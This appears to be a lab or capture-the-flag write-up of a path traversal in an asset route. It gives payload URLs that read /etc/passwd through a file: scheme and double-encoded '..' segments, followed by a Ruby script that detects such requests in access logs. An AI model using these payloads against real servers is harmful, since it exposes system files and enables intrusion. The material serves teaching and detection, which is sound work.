Construct a payload to read the /etc/passwd file:
http://219.153.49.228:46944/assets/file:%2f%2f/etc/passwd
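passwd is on the blacklist, so access is denied, but the error message discloses the directories that are allowed. Starting from an allowed directory, it is possible to traverse to /etc/passwd.
The payload is as follows: http://219.153.49.228:46944/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd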
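For detection, the two requests above can be recognised in access logs by decoding the path repeatedly before inspecting it. The following is an added example, not part of the original write-up or of the affected project; the function names and the decode-pass limit are assumptions, and the `/assets/` prefix is taken from the URLs above.

```ruby
# Added example: flag asset requests that carry a file: scheme or an encoded ".." segment.
MAX_DECODE_PASSES = 5 # assumption: cap on the nested encoding layers examined

# Percent-decode until the string stops changing, so %252e%252e -> %2e%2e -> "..".
# Returns the decoded bytes and the number of passes that changed something.
def fully_decode(path)
  current = path.b # work on raw bytes so decoded high bytes cannot raise encoding errors
  passes = 0
  MAX_DECODE_PASSES.times do
    decoded = current.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
    break if decoded == current
    current = decoded
    passes += 1
  end
  [current, passes]
end

# Returns the reasons a request path resembles the traversal above (empty = clean).
def asset_request_findings(raw_path, prefix: "/assets/")
  return [] unless raw_path.start_with?(prefix)
  decoded, passes = fully_decode(raw_path.delete_prefix(prefix))
  findings = []
  findings << :file_scheme if decoded.match?(/\Afile:/i)
  findings << :dot_dot_segment if decoded.split(%r{[/\\]}).include?("..")
  findings << :multi_encoded if passes > 1
  findings
end

# Request paths: the first two are the ones shown on this page, the last two are constructed.
SAMPLE_PATHS = [
  "/assets/file:%2f%2f/etc/passwd",
  "/assets/file:%2f%2f/usr/src/blog/app/assets/config/" + ("%252e%252e/" * 7) + "etc/passwd",
  "/assets/application-0a1b2c.css",
  "/posts/1",
].freeze

SAMPLE_PATHS.each do |path|
  findings = asset_request_findings(path)
  puts "#{findings.empty? ? 'ok   ' : 'ALERT'} #{path} #{findings.inspect}"
end
```

Checking only the raw path for `..` misses the second request, because the dots are still hidden behind two layers of percent-encoding when the request arrives.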
Vulnerability details: